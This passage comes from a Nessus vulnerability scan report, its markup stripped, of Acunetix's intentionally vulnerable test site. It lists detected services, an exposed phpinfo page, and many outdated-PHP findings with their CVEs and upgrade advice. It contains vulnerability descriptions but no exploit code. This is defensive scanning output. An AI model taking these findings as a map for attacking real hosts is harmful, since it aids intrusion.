iso-8859-1,utf-8;q=0.9,*;q=0.1 + Accept-Language: en + Connection: Keep-Alive + User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) + Pragma: no-cache + Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* + + + + The remote web server contains a cross-domain policy file. This is a simple XML file used + by Adobe's Flash Player to allow access to data that resides outside the exact web domain from + which a Flash movie file originated. + + true + crossdomain.nasl + 2021/01/19 + Web Site Cross-Domain Policy File Detection + 2008/05/15 + remote + None + 1.16 + http://www.nessus.org/u?8a58aa76 + http://kb2.adobe.com/cps/142/tn_14213.html + http://www.nessus.org/u?74a6a9a5 + http://www.nessus.org/u?acb70df2 + + Review the contents of the policy file carefully. Improper policies, especially an + unrestricted one with just '*', could allow for cross- site request forgery and cross-site + scripting attacks against the web server. + + The remote web server contains a 'crossdomain.xml' file. + + Nessus was able to obtain a cross-domain policy file from the remote + host using the following URL : + + http://testphp.vulnweb.com/crossdomain.xml + + + + True + This test gives some information about the remote HTTP protocol - the version used, whether + HTTP Keep-Alive and HTTP pipelining are enabled, etc... + + This test is informational only and does not denote any security problem. + + http_info.nasl + 2019/11/22 + HyperText Transfer Protocol (HTTP) Information + 2007/01/30 + remote + None + 1.14 + n/a + Some information about the remote HTTP configuration can be extracted. + + Response Code : HTTP/1.1 200 OK + + Protocol version : HTTP/1.1 + SSL : no + Keep-Alive : no + Options allowed : (Not implemented) + Headers : + + Server: nginx/1.19.0 + Date: Wed, 23 Mar 2022 13:53:26 GMT + Content-Type: text/html; charset=UTF-8 + Transfer-Encoding: chunked + Connection: keep-alive + X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 + + Response Body : + + <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" + "http://www.w3.org/TR/html4/loose.dtd"> + <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" + codeOutsideHTMLIsLocked="false" --> + <head> + <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> + + <!-- InstanceBeginEditable name="document_title_rgn" --> + <title>Home of Acunetix Art</title> + <!-- InstanceEndEditable --> + <link rel="stylesheet" href="style.css" type="text/css"> + <!-- InstanceBeginEditable name="headers_rgn" --> + <!-- here goes headers headers --> + <!-- InstanceEndEditable --> + <script language="JavaScript" type="text/JavaScript"> + <!-- + function MM_reloadPage(init) { //reloads the window if Nav4 resized + if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) + { + document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} + else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); + } + MM_reloadPage(true); + //--> + </script> + + </head> + <body> + <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> + <div id="masthead"> + <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" + width="306" height="38" border="0" alt="Acunetix website security"></a></h1> + <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix + Web Vulnerability Scanner</a></h6> + <div id="globalNav"> + <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> + <td align="left"> + <a href="index.php">home</a> | <a href="categories.php">categories</a> + | <a href="artists.php">artists + </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your + cart</a> | + <a href="guestbook.php">guestbook</a> | + <a href="AJAX/index.php">AJAX Demo</a> + </td> + <td align="right"> + </td> + </tr></table> + </div> + </div> + <!-- end masthead --> + + <!-- begin content --> + <!-- InstanceBeginEditable name="content_rgn" --> + <div id="content"> + <h2 id="pageName">welcome to our page</h2> + <div class="story"> + <h3>Test site for Acunetix WVS.</h3> + </div> + </div> + <!-- InstanceEndEditable --> + <!--end content --> + + <div id="navBar"> + <div id="search"> + <form action="search.php?test=query" method="post"> + <label>search art</label> + <input name="searchFor" type="text" size="10"> + <input name="goButton" type="submit" value="go"> + </form> + </div> + <div id="sectionLinks"> + <ul> + <li><a href="categories.php">Browse categories</a></li> + <li><a href="artists.php">Browse artists</a></li> + <li><a href="cart.php">Your cart</a></li> + <li><a href="login.php">Signup</a></li> + <li><a href="userinfo.php">Your profile</a></li> + <li><a href="guestbook.php">Our guestbook</a></li> + <li><a href="AJAX/index.php">AJAX Demo</a></li> + </li> + </ul> + </div> + <div class="relatedLinks"> + <h3>Links</h3> + <ul> + <li><a href="http://www.acunetix.com">Security art</a></li> + <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP + scanner</a></li> + <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP + vuln help</a></li> + <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal + Explorer</a></li> + </ul> + </div> + <div id="advert"> + <p> + <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" + width="107" height="66"> + <param name="movie" value="Flash/add.swf"> + <param name=quality value=high> + <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" + type="application/x-shockwave-flash" width="107" height="66"></embed> + </object> + </p> + </div> + </div> + + <!--end navbar --> + <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> + | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact + Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP + Parameter Pollution</a> | &copy;2019 + Acunetix Ltd + </div> + + + <br> + <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> + <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not + a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. + It is intended to help you test Acunetix. It also helps you understand how developer errors and bad + configuration may let someone break into your website. You can use it to test other tools and your + manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), + and Cross-site Request Forgery (CSRF), and more.</p> + </div> + </div> + </body> + <!-- InstanceEnd --></html> + + + + True + cpe:/a:nginx:nginx + Nessus was able to detect the nginx HTTP server by looking at the HTTP banner on the remote + host. + + nginx_detect.nasl + 0001-T-0677 + 2021/04/07 + nginx HTTP Server Detection + 2018/01/26 + remote + None + 1.6 + https://nginx.org/ + n/a + The nginx HTTP server was detected on the remote host. + IAVT:0001-T-0677 + + URL : http://testphp.vulnweb.com/ + Version : 1.19.0 + source : Server: nginx/1.19.0 + + + + 730 days + + 20349 + 20879 + 49634 + cpe:/a:php:php + CVE-2006-1015 + CVE-2006-1549 + CVE-2006-2660 + CVE-2006-4486 + CVE-2006-4625 + CVE-2006-4812 + CVE-2006-5465 + CVE-2006-5706 + CVE-2006-7205 + CVE-2007-0448 + CVE-2007-1381 + CVE-2007-1584 + CVE-2007-1888 + CVE-2007-2844 + CVE-2007-5424 + 5.9 + 7.5 + 5.9 + CVSS2#E:POC/RL:OF/RC:C + CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P + 94 + 119 + 399 + According to its banner, the version of PHP 5.x installed on the remote host is older than + 5.2. Such versions may be affected by several buffer overflows. + + To exploit these issues, an attacker would need the ability to upload an arbitrary PHP script on the + remote server or to manipulate several variables processed by some PHP functions such as 'htmlentities().' + + false + PoC + No exploit is required + php_5_2_0.nasl + 2006/11/02 + 2021/01/19 + PHP 5.x < 5.2 Multiple Vulnerabilities + 2008/03/25 + remote + Low + High + 1.28 + http://www.hardened-php.net/advisory_092006.133.html + http://www.php.net/releases/5_2_0.php + + Upgrade to PHP version 5.2.0 or later. + The remote web server uses a version of PHP that is affected by multiple buffer overflows. + + Very Low + No recorded events + No recorded events + 6.7 + 2006/11/02 + CWE:94 + CWE:119 + CWE:399 + + Version source : http://testphp.vulnweb.com/secured/phpinfo.php + Installed version : 5.1.6 + Fixed version : 5.2 + + + + 730 days + + 21508 + 22496 + 22805 + 22806 + 22862 + 22922 + 23119 + 23120 + 23219 + 23233 + 23234 + 23235 + 23236 + 23237 + 23238 + cpe:/a:php:php + CVE-2006-6383 + CVE-2007-0905 + CVE-2007-0906 + CVE-2007-0907 + CVE-2007-0908 + CVE-2007-0909 + CVE-2007-0910 + CVE-2007-0988 + CVE-2007-1376 + CVE-2007-1380 + CVE-2007-1383 + CVE-2007-1452 + CVE-2007-1453 + CVE-2007-1454 + CVE-2007-1700 + CVE-2007-1701 + CVE-2007-1824 + CVE-2007-1825 + CVE-2007-1835 + CVE-2007-1884 + CVE-2007-1885 + CVE-2007-1886 + CVE-2007-1887 + CVE-2007-1889 + CVE-2007-1890 + CVE-2007-4441 + CVE-2007-4586 + 5.9 + 7.5 + 5.9 + CVSS2#E:POC/RL:OF/RC:C + CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P + 20 + 119 + 189 + 399 + According to its banner, the version of PHP installed on the remote host is older than + 5.2.1. Such versions may be affected by several issues, including buffer overflows, format string + vulnerabilities, arbitrary code execution, 'safe_mode' and 'open_basedir' + bypasses, and clobbering of super-globals. + + false + PoC + No exploit is required + php_5_2_1.nasl + 2007/02/08 + 2021/01/19 + PHP < 5.2.1 Multiple Vulnerabilities + 2007/04/02 + remote + Low + High + 1.28 + http://www.php.net/releases/5_2_1.php + Upgrade to PHP version 5.2.1 or later. + The remote web server uses a version of PHP that is affected by multiple flaws. + Very Low + No recorded events + No recorded events + 6.7 + 2006/12/09 + CWE:20 + CWE:119 + CWE:189 + CWE:399 + + Version source : http://testphp.vulnweb.com/secured/phpinfo.php + Installed version : 5.1.6 + Fixed version : 5.2.1 + + + + 730 days + + 35440 + 35435 + cpe:/a:php:php + CVE-2009-2687 + 3.6 + 5.1 + 3.8 + CVSS2#E:U/RL:OF/RC:C + CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P + 20 + According to its banner, the version of PHP installed on the remote host is older than + 5.2.10. Such versions are reportedly affected by multiple vulnerabilities : + + - Sufficient checks are not performed on fields reserved for offsets in function 'exif_read_data()'. + Successful exploitation of this issue could result in a denial of service condition. (bug 48378) + + - Provided 'safe_mode_exec_dir' is not set (not set by default), it may be possible to + bypass 'safe_mode' restrictions by preceding a backslash in functions such as 'exec()', + 'system()', 'shell_exec()', 'passthru()' and 'popen()' on a + system running PHP on Windows. (bug 45997) + + false + Unproven + No exploit is required + php_5_2_10.nasl + 2009/06/18 + 2021/01/19 + PHP < 5.2.10 Multiple Vulnerabilities + 2009/06/22 + remote + Low + Medium + 1.13 + 35441 + https://bugs.php.net/bug.php?id=45997 + https://bugs.php.net/bug.php?id=48378 + http://www.php.net/releases/5_2_10.php + http://www.php.net/ChangeLog-5.php#5.2.10 + + Upgrade to PHP version 5.2.10 or later. + The remote web server uses a version of PHP that is affected by multiple vulnerabilities. + + Very Low + No recorded events + No recorded events + 3.6 + 2009/05/24 + Secunia:35441 + CWE:20 + + Version source : http://testphp.vulnweb.com/secured/phpinfo.php + Installed version : 5.1.6 + Fixed version : 5.2.10 + + + + 730 days + + 36449 + 44889 + cpe:/a:php:php + CVE-2009-3291 + CVE-2009-3292 + CVE-2009-3293 + CVE-2009-3294 + CVE-2009-4018 + CVE-2009-5016 + 5.9 + 7.5 + 5.9 + CVSS2#E:POC/RL:OF/RC:C + CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P + 20 + 134 + 264 + According to its banner, the version of PHP installed on the remote host is older than + 5.2.11. Such versions may be affected by several security issues : + + - An unspecified error occurs in certificate validation inside 'php_openssl_apply_verification_policy'. + + - An unspecified input validation vulnerability affects the color index in 'imagecolortransparent()'. + + - An unspecified input validation vulnerability affects exif processing. + + - Calling 'popen()' with an invalid mode can cause a crash under Windows. (Bug #44683) + + - An integer overflow in 'xml_utf8_decode()' can make it easier to bypass cross-site + scripting and SQL injection protection mechanisms using a specially crafted string with a long UTF-8 + encoding. (Bug #49687) + + - 'proc_open()' can bypass 'safe_mode_protected_env_vars'. + (Bug #49026) + + false + PoC + No exploit is required + php_5_2_11.nasl + 2009/09/16 + 2021/01/19 + PHP < 5.2.11 Multiple Vulnerabilities + 2009/09/18 + remote + Low + High + 1.19 + 36791 + http://www.php.net/ChangeLog-5.php#5.2.11 + http://www.php.net/releases/5_2_11.php + http://news.php.net/php.internals/45597 + http://www.php.net/ChangeLog-5.php#5.2.11 + + Upgrade to PHP version 5.2.11 or later. + The remote web server uses a version of PHP that is affected by multiple flaws. + Very Low + No recorded events + No recorded events + 6.7 + Secunia:36791 + CWE:20 + CWE:134 + CWE:264 + + Version source : http://testphp.vulnweb.com/secured/phpinfo.php + Installed version : 5.1.6 + Fixed version : 5.2.11 + + + + 730 days + + 37389 + 37390 + cpe:/a:php:php + CVE-2009-3557 + CVE-2009-3558 + CVE-2009-4017 + CVE-2009-4142 + CVE-2009-4143 + 5.9 + 6.8 + 5.3 + CVSS2#E:POC/RL:OF/RC:C + CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P + 79 + 264 + According to its banner, the version of PHP installed on the remote host is older than + 5.2.12. Such versions may be affected by several security issues : + + - It is possible to bypass the 'safe_mode' configuration setting using 'tempnam()'. + (CVE-2009-3557) + + - It is possible to bypass the 'open_basedir' configuration setting using 'posix_mkfifo()'. + (CVE-2009-3558) + + - Provided file uploading is enabled (it is by default), an attacker can upload files using a POST + request with 'multipart/form-data' content even if the target script doesn't actually + support file uploads per se. By supplying a large number (15,000+) of files, an attacker could cause + the web server to stop responding while it processes the file list. (CVE-2009-4017) + + - Missing protection for '$_SESSION' from interrupt corruption and improved 'session.save_path' + check. + (CVE-2009-4143) + + - Insufficient input string validation in the 'htmlspecialchars()' function. + (CVE-2009-4142) + + false + Unproven + No exploit is required + php_5_2_12.nasl + 2009/12/17 + 2021/01/19 + PHP < 5.2.12 Multiple Vulnerabilities + 2009/12/18 + remote + Low + Medium + 1.16 + 37821 + http://www.nessus.org/u?57f2d08f + http://www.php.net/releases/5_2_12.php + http://www.php.net/ChangeLog-5.php#5.2.12 + + Upgrade to PHP version 5.2.12 or later. + The remote web server uses a version of PHP that is affected by multiple flaws. + Very Low + No recorded events + No recorded events + 5.9 + 2009/12/17 + Secunia:37821 + CWE:79 + CWE:264 + + Version source : http://testphp.vulnweb.com/secured/phpinfo.php + Installed version : 5.1.6 + Fixed version : 5.2.12 + + + + 730 days + + 38182 + 38430 + 38431 + cpe:/a:php:php + CVE-2010-1128 + CVE-2010-1129 + CVE-2010-1130 + 5.3 + 6.4 + 5.0 + CVSS2#E:POC/RL:OF/RC:C + CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N + According to its banner, the version of PHP installed on the remote host is older than + 5.3.2 / 5.2.13. Such versions may be affected by several security issues : + + - Directory paths not ending with '/' may not be correctly validated inside 'tempnam()' + in 'safe_mode' configuration. + + - It may be possible to bypass the 'open_basedir'/ 'safe_mode' configuration + restrictions due to an error in session extensions. + + - An unspecified vulnerability affects the LCG entropy. + + false + Unproven + No exploit is required + php_5_2_13.nasl + 2010/02/25 + 2021/01/19 + PHP < 5.3.2 / 5.2.13 Multiple Vulnerabilities + 2010/02/26 + remote + Low + Medium + 1.16 + 38708 + http://securityreason.com/achievement_securityalert/82 + http://securityreason.com/securityalert/7008 + https://seclists.org/fulldisclosure/2010/Feb/208 + http://www.php.net/releases/5_3_2.php + http://www.php.net/ChangeLog-5.php#5.3.2 + http://www.php.net/releases/5_2_13.php + http://www.php.net/ChangeLog-5.php#5.2.13 + + Upgrade to PHP version 5.3.2 / 5.2.13 or later. + The remote web server uses a version of PHP that is affected by multiple flaws. + Very Low + No recorded events + No recorded events + 5.3 + 2010/02/11 + Secunia:38708 + + Version source : http://testphp.vulnweb.com/secured/phpinfo.php + Installed version : 5.1.6 + Fixed version : 5.3.2 / 5.2.13 + + + + 730 days + + 23105 + 23357 + cpe:/a:php:php + CVE-2007-1001 + CVE-2007-1583 + CVE-2007-1649 + CVE-2007-1717 + CVE-2007-1718 + 7.5 + 6.7 + CVSS:3.0/E:P/RL:O/RC:C + CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + 5.8 + 7.8 + CVE-2007-1649 + 6.1 + CVSS2#E:POC/RL:OF/RC:C + CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N + According to its banner, the version of PHP 5.x installed on the remote host is older than + 5.2.2. It is, therefore, affected by multiple vulnerabilities: + + - A heap-based buffer overflow vulnerability was found in PHP's gd extension. A script that + could be forced to process WBMP images from an untrusted source could result in arbitrary code + execution. (CVE-2007-1001) + + - A vulnerability in the way the mbstring extension setglobal variables was discovered where a + script using the mb_parse_str() function to set global variables could be forced to to enable the + register_globals configuration option, possibly resulting in global variable injection. + (CVE-2007-1583) + + - A context-dependent attacker could read portions of heap memory by executing certain scripts with + a serialized data input string beginning with 'S:', which did not properly track the + number of input bytes being processed. (CVE-2007-1649) + + - A vulnerability in how PHP's mail() function processed email messages, truncating potentially + important information after the first ASCIIZ (\0) byte. + (CVE-2007-1717) + + - A vulnerability in how PHP's mail() function processed header data was discovered. If a + script sent mail using a subject header containing a string from an untrusted source, a remote + attacker could send bulk email to unintended recipients (CVE-2007-1718). + + false + PoC + No exploit is required + php_5_2_2.nasl + 2007/05/03 + 2021/01/19 + PHP 5.x < 5.2.2 Multiple vulnerabilities + 2012/01/11 + remote + Low + High + 1.8 + http://www.php.net/releases/5_2_2.php + Upgrade to PHP version 5.2.2 or later. + The remote web server uses a version of PHP that is affected by multiple vulnerabilities. + + Very Low + No recorded events + No recorded events + 6.6 + 2007/03/23 + + Version source : http://testphp.vulnweb.com/secured/phpinfo.php + Installed version : 5.1.6 + Fixed version : 5.2.2 + + + + 730 days + + 23235 + 23359 + 24089 + 24259 + 24261 + cpe:/a:php:php + CVE-2007-1887 + CVE-2007-1900 + CVE-2007-2756 + CVE-2007-2872 + CVE-2007-3007 + 7.3 + 6.6 + CVSS:3.0/E:P/RL:O/RC:C + CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + 5.9 + 7.5 + CVE-2007-1887 + 5.9 + CVSS2#E:POC/RL:OF/RC:C + CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P + 189 + 264 + According to its banner, the version of PHP installed on the remote host is older than + 5.2.3. It is, therefore, affected by multiple vulnerabilities: + + - A buffer overflow in the sqlite_decode_function() in the bundled sqlite library could allow + context-dependent attackers to execute arbitrary code. (CVE-2007-1887) + + - A CRLF injection vulnerability in the FILTER_VALIDATE_EMAIL filter could allow an attacker to + inject arbitrary email headers via a special email address. This only affects Mandriva Linux 2007.1. + (CVE-2007-1900) + + - An infinite-loop flaw was discovered in the PHP gd extension. A script that could be forced to + process PNG images from an untrusted source could allow a remote attacker to cause a denial of + service. (CVE-2007-2756) + + - An integer overflow flaw was found in the chunk_split() function that ould possibly execute + arbitrary code as the apache user if a remote attacker was able to pass arbitrary data to the third + argument of chunk_split() (CVE-2007-2872). + + - An open_basedir and safe_mode restriction bypass which could allow context-dependent attackers to + determine the existence of arbitrary files. (CVE-2007-3007) + + false + PoC + No exploit is required + php_5_2_3.nasl + 2007/05/31 + 2021/01/19 + PHP < 5.2.3 Multiple Vulnerabilities + 2007/06/02 + remote + Low + High + 1.25 + http://www.php.net/releases/5_2_3.php + Upgrade to PHP version 5.2.3 or later. + The remote web server uses a version of PHP that is affected by multiple flaws. + Very Low + No recorded events + No recorded events + 6.7 + 2007/04/07 + CWE:189 + CWE:264 + + Version source : http://testphp.vulnweb.com/secured/phpinfo.php + Installed version : 5.1.6 + Fixed version : 5.2.3 + + + + 730 days + + 24661 + 24261 + 24922 + 25498 + cpe:/a:php:php + CVE-2007-1413 + CVE-2007-2872 + CVE-2007-3294 + CVE-2007-3378 + CVE-2007-3790 + CVE-2007-3799 + CVE-2007-3806 + CVE-2007-4010 + CVE-2007-4033 + CVE-2007-4255 + CVE-2007-4507 + CVE-2007-4652 + CVE-2007-4658 + CVE-2007-4659 + CVE-2007-4660 + CVE-2007-4661 + CVE-2007-4662 + CVE-2007-4663 + 5.9 + 6.8 + 5.3 + CVSS2#E:POC/RL:OF/RC:C + CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P + 20 + 22 + 119 + 189 + 362 + 399 + According to its banner, the version of PHP installed on the remote host is older than + 5.2.4. Such versions may be affected by various issues, including but not limited to several + overflows. + + false + PoC + No exploit is required + php_5_2_4.nasl + 2007/08/30 + 2021/01/19 + PHP < 5.2.4 Multiple Vulnerabilities + 2007/09/03 + remote + Low + Medium + 1.21 + http://www.php.net/releases/5_2_4.php + Upgrade to PHP version 5.2.4 or later. + The remote web server uses a version of PHP that is affected by multiple flaws. + Very Low + No recorded events + No recorded events + 6.7 + 2007/06/01 + CWE:20 + CWE:22 + CWE:119 + CWE:189 + CWE:362 + CWE:399 + + Version source : http://testphp.vulnweb.com/secured/phpinfo.php + Installed version : 5.1.6 + Fixed version : 5.2.4 + + + + 730 days + + 26403 + 69246 + cpe:/a:php:php + CVE-2007-3996 + CVE-2007-4782 + CVE-2007-4783 + CVE-2007-4784 + CVE-2007-4825 + CVE-2007-4840 + CVE-2007-4887 + CVE-2007-4889 + CVE-2007-5447 + CVE-2007-5653 + CVE-2007-5898 + CVE-2007-5899 + CVE-2007-5900 + CVE-2008-2107 + CVE-2008-2108 + CVE-2008-4107 + 5.9 + 4.4 + 3.4 + CVSS2#E:POC/RL:OF/RC:C + CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P + 20 + 22 + 78 + 94 + 189 + 200 + 264 + According to its banner, the version of PHP installed on the remote host is older than + 5.2.5. Such versions may be affected by various issues, including but not limited to several buffer + overflows. + + false + PoC + No exploit is required + php_5_2_5.nasl + 2021/01/19 + PHP < 5.2.5 Multiple Vulnerabilities + 2007/11/12 + remote + Low + Medium + 1.21 + http://www.php.net/releases/5_2_5.php + Upgrade to PHP version 5.2.5 or later. + The remote web server uses a version of PHP that is affected by multiple flaws. + Very Low + No recorded events + No recorded events + 6.7 + 2007/09/10 + CWE:20 + CWE:22 + CWE:78 + CWE:94 + CWE:189 + CWE:200 + CWE:264 + + Version source : http://testphp.vulnweb.com/secured/phpinfo.php + Installed version : 5.1.6 + Fixed version : 5.2.5 + + + + 730 days + + 27413 + 28392 + 29009 + cpe:/a:php:php + CVE-2007-4850 + CVE-2007-6039 + CVE-2008-0599 + CVE-2008-1384 + CVE-2008-2050 + CVE-2008-2051 + 5.9 + 7.5 + 5.9 + CVSS2#E:POC/RL:OF/RC:C + CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P + 20 + 119 + 264 + According to its banner, the version of PHP installed on the remote host is older than + 5.2.6. Such versions may be affected by the following issues : + + - A stack-based buffer overflow in FastCGI SAPI. + + - An integer overflow in printf(). + + - An security issue arising from improper calculation of the length of PATH_TRANSLATED in + cgi_main.c. + + - A safe_mode bypass in cURL. + + - Incomplete handling of multibyte chars inside escapeshellcmd(). + + - Issues in the bundled PCRE fixed by version 7.6. + + false + Unproven + No exploit is required + php_5_2_6.nasl + 2021/01/19 + PHP < 5.2.6 Multiple Vulnerabilities + 2008/05/02 + remote + Low + High + 1.29 + 30048 + https://seclists.org/bugtraq/2008/Mar/285 + https://seclists.org/fulldisclosure/2008/May/102 + https://seclists.org/fulldisclosure/2008/May/106 + http://www.php.net/releases/5_2_6.php + + Upgrade to PHP version 5.2.6 or later. + The remote web server uses a version of PHP that is affected by multiple flaws. + Very Low + No recorded events + No recorded events + 5.9 + Secunia:30048 + CWE:20 + CWE:119 + CWE:264 + + Version source : http://testphp.vulnweb.com/secured/phpinfo.php + Installed version : 5.1.6 + Fixed version : 5.2.6 + + + + 730 days + + 29796 + 29797 + 29829 + 30087 + 30649 + 31612 + 32383 + 32625 + 32688 + 32948 + 70928 + cpe:/a:php:php + CVE-2008-2371 + CVE-2008-2665 + CVE-2008-2666 + CVE-2008-2829 + CVE-2008-3658 + CVE-2008-3659 + CVE-2008-3660 + CVE-2008-5557 + CVE-2008-5624 + CVE-2008-5625 + CVE-2008-5658 + CVE-2008-7068 + CVE-2014-8626 + 5.9 + 7.5 + 5.9 + CVSS2#E:POC/RL:OF/RC:C + CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P + 20 + 22 + 119 + 264 + According to its banner, the version of PHP installed on the remote host is prior to 5.2.7. + It is, therefore, affected by multiple vulnerabilities : + + - There is a buffer overflow flaw in the bundled PCRE library that allows a denial of service + attack. + (CVE-2008-2371) + + - Multiple directory traversal vulnerabilities exist in functions such as 'posix_access', + 'chdir', and 'ftok' that allow a remote attacker to bypass 'safe_mode' + restrictions. (CVE-2008-2665 and CVE-2008-2666). + + - A buffer overflow flaw in 'php_imap.c' may be triggered when processing long message + headers due to the use of obsolete API calls. This can be exploited to cause a denial of service or + to execute arbitrary code. + (CVE-2008-2829) + + - A buffer overflow in the 'imageloadfont' function in 'ext/gd/gd.c' can be + triggered when a specially crafted font is given. This can be exploited to cause a denial of service + or to execute arbitrary code. (CVE-2008-3658) + + - A buffer overflow flaw exists in PHP's internal function 'memnstr' which can be + exploited by an attacker using the delimiter argument to the 'explode' function. This can + be used to cause a denial of service or to execute arbitrary code. (CVE-2008-3659) + + - When PHP is used as a FastCGI module, an attacker by requesting a file whose file name extension + is preceded by multiple dots can cause a denial of service. + (CVE-2008-3660) + + - A heap-based buffer overflow flaw in the mbstring extension can be triggered via a specially + crafted string containing an HTML entity that is not handled during Unicode conversion. This can be + exploited to execute arbitrary code.(CVE-2008-5557) + + - Improper initialization of global variables 'page_uid' and 'page_gid' when PHP + is used as an Apache module allows the bypassing of security restriction due to SAPI 'php_getuid' + function overloading. (CVE-2008-5624) + + - PHP does not enforce the correct restrictions when 'safe_mode' is enabled through a + 'php_admin_flag' setting in 'httpd.conf'. This allows an attacker, by placing a + specially crafted 'php_value' entry in '.htaccess', to able to write to + arbitrary files. + (CVE-2008-5625) + + - The 'ZipArchive::extractTo' function in the ZipArchive extension fails to filter + directory traversal sequences from file names. An attacker can exploit this to write to arbitrary + files. (CVE-2008-5658) + + - Under limited circumstances, an attacker can cause a file truncation to occur when calling the + 'dba_replace' function with an invalid argument. (CVE-2008-7068) + + - A buffer overflow error exists in the function 'date_from_ISO8601' function within file + 'xmlrpc.c' because user-supplied input is improperly validated. + This can be exploited by a remote attacker to cause a denial of service or to execute arbitrary + code. + (CVE-2014-8626) + + false + Unproven + No exploit is required + php_5_2_7.nasl + 2008/12/04 + 2021/01/19 + PHP 5 < 5.2.7 Multiple Vulnerabilities + 2008/12/05 + remote + Low + High + 1.31 + http://cxsecurity.com/issue/WLB-2008110041 + http://cxsecurity.com/issue/WLB-2008110058 + http://cxsecurity.com/issue/WLB-2008120011 + https://seclists.org/fulldisclosure/2008/Jun/237 + https://seclists.org/fulldisclosure/2008/Jun/238 + https://www.openwall.com/lists/oss-security/2008/08/08/2 + https://www.openwall.com/lists/oss-security/2008/08/13/8 + https://seclists.org/fulldisclosure/2008/Nov/674 + https://seclists.org/fulldisclosure/2008/Dec/90 + https://bugs.php.net/bug.php?id=42862 + https://bugs.php.net/bug.php?id=45151 + https://bugs.php.net/bug.php?id=45722 + http://www.php.net/releases/5_2_7.php + http://www.php.net/ChangeLog-5.php#5.2.7 + + Upgrade to PHP version 5.2.8 or later. + + Note that version 5.2.7 has been removed from distribution because of a regression in that version + that results in the 'magic_quotes_gpc' setting remaining off even if it was set to on. + + The remote web server uses a version of PHP that is affected by multiple vulnerabilities. + + Very Low + > 365 days + No recorded events + 6.7 + 2008/06/19 + CWE:20 + CWE:22 + CWE:119 + CWE:264 + + Version source : http://testphp.vulnweb.com/secured/phpinfo.php + Installed version : 5.1.6 + Fixed version : 5.2.7 + + + + 730 days + + 32673 + cpe:/a:php:php + CVE-2008-5814 + CVE-2008-5844 + 5.5 + 7.5 + 5.5 + CVSS2#E:U/RL:OF/RC:C + CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P + 16 + 79 + According to its banner, the version of PHP installed on the remote host is earlier than + 5.2.8. As such, it is potentially affected by the following vulnerabilities : + + - PHP fails to properly sanitize error messages of arbitrary HTML or script code, would code allow + for cross-site scripting attacks if PHP's 'display_errors' setting is enabled. + (CVE-2008-5814) + + - Version 5.2.7 introduced a regression with regard to 'magic_quotes' functionality due to + an incorrect fix to the filter extension. As a result, the 'magic_quotes_gpc' setting + remains off even if it is set to on. (CVE-2008-5844) + + false + Unproven + No exploit is required + php_5_2_8.nasl + 2021/01/19 + PHP < 5.2.8 Multiple Vulnerabilities + 2008/12/09 + remote + Low + High + 1.19 + https://bugs.php.net/bug.php?id=42718 + http://www.php.net/releases/5_2_8.php + + Upgrade to PHP version 5.2.8 or later. + The remote web server uses a version of PHP that may be affected by multiple + vulnerabilities. + + Very Low + No recorded events + No recorded events + 5.5 + CWE:16 + CWE:79 + + Version source : http://testphp.vulnweb.com/secured/phpinfo.php + Installed version : 5.1.6 + Fixed version : 5.2.8 + + + + 730 days + + 33002 + 33927 + cpe:/a:php:php + CVE-2008-5498 + CVE-2009-1271 + CVE-2009-1272 + 3.6 + 5.0 + 3.9 + CVSS2#E:POC/RL:OF/RC:C + CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P + 20 + 200 + According to its banner, the version of PHP installed on the remote host is older than + 5.2.9. Such versions may be affected by several security issues : + + - Background color is not correctly validated with a non true color image in function 'imagerotate()'. + (CVE-2008-5498) + + - A denial of service condition can be triggered by trying to extract zip files that contain files + with relative paths in file or directory names. + + - Function 'explode()' is affected by an unspecified vulnerability. + + - It may be possible to trigger a segfault by passing a specially crafted string to function 'json_decode()'. + + - Function 'xml_error_string()' is affected by a flaw which results in messages being off + 